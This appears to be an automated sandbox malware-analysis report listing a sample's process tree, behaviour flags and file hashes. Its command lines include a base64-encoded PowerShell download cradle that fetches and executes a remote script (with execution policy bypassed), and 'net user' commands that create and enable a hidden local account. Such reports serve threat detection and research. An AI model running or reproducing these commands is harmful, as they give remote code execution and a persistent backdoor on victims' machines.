C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1192
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3920
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes1⤵PID:2792
-
C:\Windows\system32\net.exenet user wgautilacc 1112132⤵PID:3840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 1112133⤵PID:3864
-
C:\Windows\system32\net.exenet user wgautilacc /active:yes2⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc /active:yes3⤵PID:3032
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d20863fa6b0378e7daaec2b72d33aed3
SHA1106e22bc3740f508141d43cf1b0bbe9a8ac31b7e
SHA25698ecd1e7e1bc753350908682b9d5b01f615cacc54a8799b5d74f26c0b7adf4ac
SHA5121448ac20f4037cadd812f6065436d8eca3229b91dc4e690a9a6eb2d9b1d7d680d268ff408a0492124cb4d8a8030fb494f256f3878de578286e66c591be315d7c
-
MD5
8d61eb01ab6c18cc3c251984818fbfb2
SHA1b94e390db6e40554412857a7b38ed75d8a4d9087
SHA256f4cf621f55893c4f6b72f9cfd4d6a2bb2e4538cdfb9c4d576a2ab68057f0cae7
SHA512e3f1365afc45825e872852297dbf9a4c6d555e9fdda9b0592c6ee0b64ac61c3e1a23501416a20334bde407a292857840f265cc03ab146ffa69ea020bc82e3f45
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
00fb904b2dd958760943b89400e9b7f9
SHA18c825862b6f70cbaef991525f31100f713e61e7d
SHA256392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
-
MD5
3673bdfd482ecb3c60847ba43dc03365
SHA1ed52d2eb389812ee0b2cb3c38fb3aa1e913b3573
SHA25650d46724a8ad6c9437ca7259e7cf9468819fc934a2bf667e2d3adcb255ed7e40
SHA51275cfd122c20a19b590584351166ffb645cc4280555785d89b97d27ba0b796c3e45893df758c69e0a3eb412f32b5b363c6d2f9a122ecd38f06164aaf7a6068cbe
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
d2198ed3f1bd7df8a4f8a7e11fc29f3f
SHA1700fba90c732dd00c201ab9845a62c1623227632
SHA256c7abf2dfd55f3dae12b2d788e293935425e30f7b4f1fe47fb8f38edcec48c6cf
SHA512fd4173b651a2f1c08533fac77dae2ffcf67ea1dfe3cadacf5da498dfd5d80f26be807346c1acd0e12a6fe6bf18ac5fe89f5594d86f4bf4529af639a9c46fbd47
-
MD5
b110f38845e18a04ab59a7d8a134ef40
SHA18119030034e6fbe62d875e824b5233c1f29d61a0
SHA2561cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA51280eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223
-
MD5
5768a809b9fcbff117dffa8cbf2e8852
SHA1a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA2568ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA51299d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b